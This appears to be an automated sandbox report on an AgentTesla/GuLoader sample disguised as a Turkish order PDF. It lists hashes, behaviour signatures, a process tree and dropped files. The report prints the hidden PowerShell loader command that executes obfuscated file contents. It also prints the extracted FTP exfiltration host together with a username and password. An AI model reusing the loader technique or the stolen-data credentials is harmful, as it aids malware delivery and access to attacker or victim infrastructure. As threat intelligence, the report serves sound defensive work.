Overview

overview

10

Static

static

1

SİPARİŞ...df.exe

windows7-x64

10

SİPARİŞ...df.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    138s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231130-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231130-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-12-2023 10:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SİPARİŞ NO.ZD33166-pdf.exe

  • Size

    684KB

  • MD5

    8db600d5b4168b5d358209fa4b85bd5f

  • SHA1

    d6822e043548fbacd692a14d7dc17250482c43bc

  • SHA256

    2ef9a5215999c03ea03636ae06f8c66b3ed1274153bdaec215a189cd148669b5

  • SHA512

    c2103215579019f69aa3e4adfa2067d90c9189c093c7b065e9693e3d8745f084810e7652dd0e2e6638eecc18344641aaa23460eb2799c3829b73462b08f741ca

  • SSDEEP

    12288:swFGHEDwfu4MFVS/GCFj+an2ry7/hFwz7ylgimtdYM3O0V7bbj:s5HEMfuDDSuCF6an2rg/hF7lgZtub0Vv

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SİPARİŞ NO.ZD33166-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\SİPARİŞ NO.ZD33166-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3376
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Osirify120=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win';$Calvarias=$Osirify120.SubString(53221,3);.$Calvarias($Osirify120)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4088
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1860
          4⤵
          • Program crash
          PID:3692
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4088 -ip 4088
    1⤵
      PID:4952

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hag4akgn.euh.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Bojanna.Win
      Filesize

      52KB

      MD5

      b78df76358c01d725b0d9e498d32d595

      SHA1

      89c5bc6f9d1d1da207899ce0677c24a99329dc70

      SHA256

      6cacb39cdff332ae98782d33db6fc877a76a8e1e01fa7a0ec9acf45a19cca2ea

      SHA512

      d7268e8c0e6040515d385835206af5b67c78ec5f6c4bdf7053ec28c00e3dcfdfa318fd03935e989bd856e3614a2ebb2d8bc50e2ecdbe7433b211291b0746cf8d

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Overfit.Hov
      Filesize

      270KB

      MD5

      ec46e3263c35f658579cd1572e57def0

      SHA1

      18468cb8363e04d8257fd5503cc6350ff7432b88

      SHA256

      690cdbe972c183ace073bad0f8567a3f2f2f15bf3f31e0e714797fdd68bc4e03

      SHA512

      d283ea4285dd37379499dc45128449b05b41229149d22819d3b40f80deba233be346741242d6f64f0697562f1fbec5d2818b7d05e0a4d95692246334bca85768

      Download Submit

    • memory/3284-176-0x0000000008550000-0x0000000008BCA000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3284-180-0x0000000008BD0000-0x000000000A794000-memory.dmp

      Filesize

      27.8MB

      Download

    • memory/3284-157-0x0000000005BB0000-0x0000000005C16000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3284-155-0x0000000005450000-0x0000000005A78000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3284-158-0x0000000005C90000-0x0000000005CF6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3284-156-0x0000000005420000-0x0000000005442000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3284-168-0x0000000005EF0000-0x0000000006244000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3284-169-0x00000000062C0000-0x00000000062DE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3284-170-0x0000000006310000-0x000000000635C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3284-172-0x00000000067F0000-0x000000000680A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3284-173-0x0000000006810000-0x0000000006832000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3284-174-0x0000000007920000-0x0000000007EC4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3284-171-0x00000000068D0000-0x0000000006966000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3284-154-0x0000000004E10000-0x0000000004E20000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3284-153-0x0000000004E10000-0x0000000004E20000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3284-152-0x0000000073980000-0x0000000074130000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3284-179-0x0000000007840000-0x0000000007844000-memory.dmp

      Filesize

      16KB

      Download

    • memory/3284-151-0x0000000004D10000-0x0000000004D46000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3284-181-0x0000000008BD0000-0x000000000A794000-memory.dmp

      Filesize

      27.8MB

      Download

    • memory/3284-182-0x00000000775E1000-0x0000000077701000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/3284-183-0x0000000073980000-0x0000000074130000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3284-190-0x0000000073980000-0x0000000074130000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3284-185-0x0000000004E10000-0x0000000004E20000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3284-194-0x0000000008BD0000-0x000000000A794000-memory.dmp

      Filesize

      27.8MB

      Download

    • memory/4088-187-0x00000000775E1000-0x0000000077701000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/4088-188-0x000000006E780000-0x000000006F9D4000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/4088-191-0x0000000073980000-0x0000000074130000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4088-192-0x000000006E780000-0x000000006E7C0000-memory.dmp

      Filesize

      256KB

      Download

    • memory/4088-193-0x000000001DF70000-0x000000001DF80000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4088-186-0x0000000077668000-0x0000000077669000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4088-184-0x0000000000600000-0x00000000021C4000-memory.dmp

      Filesize

      27.8MB

      Download

    • memory/4088-189-0x0000000000600000-0x00000000021C4000-memory.dmp

      Filesize

      27.8MB

      Download

    • memory/4088-195-0x0000000000600000-0x00000000021C4000-memory.dmp

      Filesize

      27.8MB

      Download

    • memory/4088-197-0x0000000073980000-0x0000000074130000-memory.dmp

      Filesize

      7.7MB

      Download